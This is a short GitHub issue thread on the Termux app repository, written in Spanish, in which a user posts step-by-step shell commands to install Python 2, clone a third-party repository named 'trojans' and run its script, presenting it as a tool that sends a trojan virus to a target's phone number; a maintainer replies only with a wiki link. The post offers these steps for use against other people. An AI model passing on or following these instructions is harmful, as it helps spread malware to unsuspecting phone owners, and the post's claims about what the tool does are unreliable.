### ISSUE TITLE
Como crear un virus troyano en termux 

### ISSUE THREAD

**Issue by Elcuervo666** [termux/termux-app#2175]
Que es :Estos códigos que les voy a dejar son para crear una herramienta que manda virus troyano por número de celular

                      Códigos

1)  apt install git

2) apt install python2

3)  git clone HTTPS://github.com/R133F/trojans

4) CD trojans 

5) ls

6) chmod +x *

7) ls 

8) python2 trojans.py

              Espero que les sirva usenlo con responsabilidad los saluda el cuervo

**Comment by agnostic-apollo** [comment]
https://wiki.termux.com/wiki/Hacking
